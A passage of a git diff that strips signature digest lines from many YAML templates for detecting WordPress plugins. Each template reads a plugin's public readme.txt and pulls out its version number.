a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022045cff4d4c294f55aa5faf268d7676a6a5faa0b26ab26c6b0a054ef42e387e0c602204e11ab28a07485fb9c23f407a4bfc9f8a0d115acf54dacc2fd0b3b35b63c77d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index bf1d053ae6..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0be34b5a53b1b813f5d1370b926c04335cee580d02993b3c1b36abd881a618b02200fc072be33753ad0fd8f27bd743783e719c64bd8634da17a7068a6c3ed57f46d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 38c4f6ca7f..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220275bc1a99d3b7a316b58788d2c4e8bb9019ab8e99b6ac6d7fb7c3e513bd191df0220658e25253eeff22882da1a1e1b15cd6898b0aeb2c0b7c3d6db80980ece740f2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index f4104ee1ba..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022065d03f763f3dc7de2856cb625ce5fba3c24562885f428a14a7b519d5d634bf4c022100ebbbb6f8ffb60fdf791f5c2887b2b8a817bf125a05371a5c2b0ec0ebeb06204b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 9c7750c412..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b69977e7517ae20c140d5b9bb49d357d25755c5f999b9361ebe4d5713bc69e530220202a8e993f19166528de0636b9e8839594463a56c2add8acf9046b97c7f27be9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index ee50416117..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aa7afda8bd39aab2688910f3e0bb686a91277568d6403303263df20d93ca11350221008b1d9326d6a156653e4f7487c4e6e8a8b3ff6390f6443e5bc5638abb105261c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 5d38e834d2..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202f88ddb878b042adc5455a8656385dfac23e23a39af822824dd1db29517aa8c202203fdaed9c806961338ac725b4f28df298ba9af14a2f6b8c1695aeeb4c0edaee8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 39e5f2ce55..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204b7a837750b6cb54c1acb94592a54008ab06bb1ca89f7e56cdb974b96dc4ef7602205c219ea77996fd192f117195c9fbbc43d5c2285b8d361aab29e7b41d3efc301c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index ccec98a8fa..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100812a2e2d46de5040f1681354235fe190b0ef22fc76b4be6bc092d7f03408892e0220317f8e0d347519f225dfe3266673a71e78f26ac630713d7057ccf8e887d29a02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index abb83127b6..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d5a0577d666c6d48c42e758b76d55dc5f42554e5ed9916841b954eeb4b9f974022100c81b4881a91d228da7efd66768ffa915f8a92ff3cb7a5c0a808cc3713779a988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3ec8e90a1c..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085f6d6813aaecb8f703a22ba653fff18978c8e887a65204873769f35568520d6022100f380d09926f7cd371cdd6e3b3a4124ae03b4259d1fd5eb95088b1c83efe3fb38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 07193ea748..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100960159075ea286ffca640edc35ab5d25d11b292ff5f98763712af0951aed9650022100f09beda83e4ba8bcc95bc7c8fea83a5091b4915449598fa44bfdc7b7a6e2194e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 7b360c0ebf..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/copy-delete-posts/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009aa63d26163a7324d8648de64e96c764cf0fc62f6020c11ab43e653c10bf5c05022100cf28d21ce594945c548e99dacb263e3d614337ce17ca57bcda17f27ed19b0b37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 34bbc7b4dc..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d2cea40cb6ec215d083caf423b3a634e8376f8d196716fcc603708452e792c07022100ee7cd72e3d2c3e24fc3888f2d25507a59de9157560d1f531fcccb5b6ce66701e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index c6caa779e1..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e160dbf971e26bac25b538564d8d080a9e5aed3b21c47b5b1b80bc8e0a9116f1022100eb26d0be9696e9aedeabaddfa5db4fddb844f671d4cda6b862fc5fcd5d140a27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 575bbb96cd..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a0dd3c607a0ffec858011cda7b84a22de628e39675adf8d3cdf910011f585ef02203a085179d0f2e492d43b2f3882a0a67986e53ff8633737dd524f87097d1988dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 4494590437..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202a17fdf49e06a3e012c210b315a8773944ed3c74e142581617e415717d7b1499022100e984597e08e1c2a0403fa69acec3cbfaeab4dff6607697ec0bac6563875528a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6faa03677e..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d7ceaebf1d0af2e978e23c9837aba331b07cc0c2d4d8c2ae10caa72cc50cda7502202ac6a5fc60c4853acb66c0c9c9e9b59c0a38a05779c148b70d58be1c61a512bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 81a0f9b0ba..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210095b3371627164e73684841d9dd61d08c7992af18114f3a9feeee43f14f167ccc022100ec22fc7d5aa8cd9543e6f097cd0a568c3ea3dfb87df9204f6c81d1a2ed14285d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index fff8099307..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009adaf081a68546a76384cc8eb28321e8b5c1cc40bba6d0e698f3114ddb5402b202201c4751096cbe9733304d4414e226e5c21c542c81792ee2a373e21c778d0e7a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index f77bba46ff..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022047058676cd7c2ddc1af1011c26393fb627895dbfbdae84ddc093e45f0239dc7e022067345712faf718b018a5b3e282d6456c8c0bb228bd191cee65904ec1cd25b5fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index fa0529a971..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a8bad2c53d903c27e72ca0d36ec67e578f9e9326fd237d4ad0c6bce1956e494802205af09b11aefbe945c448573c4b8ffb796ba3940824ecc5bf09ae7be948cae834:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 768c5be417..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022017923fc42f92da4b14f291f24497fb5be5a94759a577571d2bb11515156e1215022071ba0c03219ac05a22d394d24b108eba3ef50552c23f974f5ac6fba0c631d12c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 7f5be09440..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220563074ddd8e4bb4398a726b195d130da53578a0156063603dab2da76393a88fb02207810fc3988d7c8ae20dd3d3be7863859e8942547ff70d82ce1bf24b1cfffbbd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index e2ca97ae58..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/easy-table-of-contents/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022055a55cf56bec0f9e1c8e02b9fa7089d5d5aa02b2fa59e8426ee4a9b5103950b402204849a4bde1fa93016865a08e04799ded56920b1ecb52d05bd5dd4ae6336d843c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 9b59edeef4..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e91e35f75fb5bc9f322dff531b80b708415e8f97104073ec700aaf22e604429c0220544de4f34e9728bf131db8c2939a6b2306f44ae0254d7d8432dda826270b72b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 434ad9d715..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d9eafa68df5112a2d4b5ee2050eee28412c6e785ea6ff67a10e652b4adcc2d95022100ae6beb78c6a17cd1f49470fc5a626aee0b147486a6b64a84b280e804cfa58a5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index ec227e1305..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/elementskit-lite/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220778d4580422182b2b1c1154e147b628a5171f998c8f4e91a4fb280db2b27672002206039f3da462bd19445929f109a56bb6c0c336a8f3fa80ff05c4a4def895aeee7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index b2f72d5311..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/enable-media-replace/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dcb5b1d246cdb94f83ac1c71a2e585fe6080a59e2cd31fdb6dcaae4508baee6a022100eb55d5d6a2cca3aea401f45af223e9b80ed2e19963fdaa108da5659f9095874e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index dfe9a084d6..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/envato-elements/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b44bdbbfdadbf3e228609b497171cedb84558058c3274ac3b48966aec30b8b53022100da17108a006961a25586597fc7d152a2a0314516df81e5cb35690c3bba37f586:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 9c4b7117bd..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c1e68312d1ff45008d007ba91639a82abbda8afa046fc019be595af7c061c97a02203f261773d256de3c13df218c708256b03ab27a038a0bac1b35be6e5a36da64de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index ed28215184..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ewww-image-optimizer/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022022d9d5d97972467d7307b8f85f4b18b7f9222f00542e31d07e1e4a046c9a1d1002201811dbdf200f4e87e9ad24f2d453d775d25a2fb3499b8699f7d31f5f0c1de736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 1e94a2e6e4..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/facebook-for-woocommerce/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220327fd5ed9f3e666d23f4f1c7c928b96ac3c7331e2a1f4213d2ae6656ddbfd3f102203115a840ea5de3807f85a19661fb342a503d0440c6f0ce8ca95bb0258b835eb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index e37883ffdf..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/fast-indexing-api/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206139eb00e53974097577281c92773510bca695aa3d6f8e94e6fd11157d3cbe33022100b1c7b1c5a62fa636c4f11f17a3159f1d5daaa3764fc82ff699acb868f6d63283:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index f4f7c01081..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/favicon-by-realfavicongenerator/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f30eaf22f5cdda9dc9bd43f9dff67184c1a211850b90138df80a917e507aeb8022100d40545a6d58daf2d085fb8fa1e1f03b15917dd5d1136359008d488df1bde9ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index b9aaf1c789..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/flamingo/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f98a68c0f3a6ade42935187888ffe174830ce8431206328e82599a5da9adc989022056fded8f60af004f38dbfd92068067a756019c3c44649002618070a8f3c25a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index a971950090..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206bd171350ab49d8b39d4a702ed2146d140042ed6b2408b4cf4399be3b2a5467d0220269770701fd1081866e4c551d8aebce6ad58d37fa2228de535ec765d8318d959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index e937938563..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/font-awesome/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bc9c41b8d8cb99f5681b89efe181053d82d731939d70c077c13061618a64100102205051fc6d5866f2399e5fc903ac5f627f154d94c87890a18659cffcc0414f522c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index a9f590164e..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/force-regenerate-thumbnails/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ac69c444e41095642acc72183436aaf45efe59e2ec3c8fb45f4436d37e76384022015388cf6bdd0e9b24635d5bf12d70e84a7de63456d0af84998a9f30ee29a4705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 95d22503d7..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ 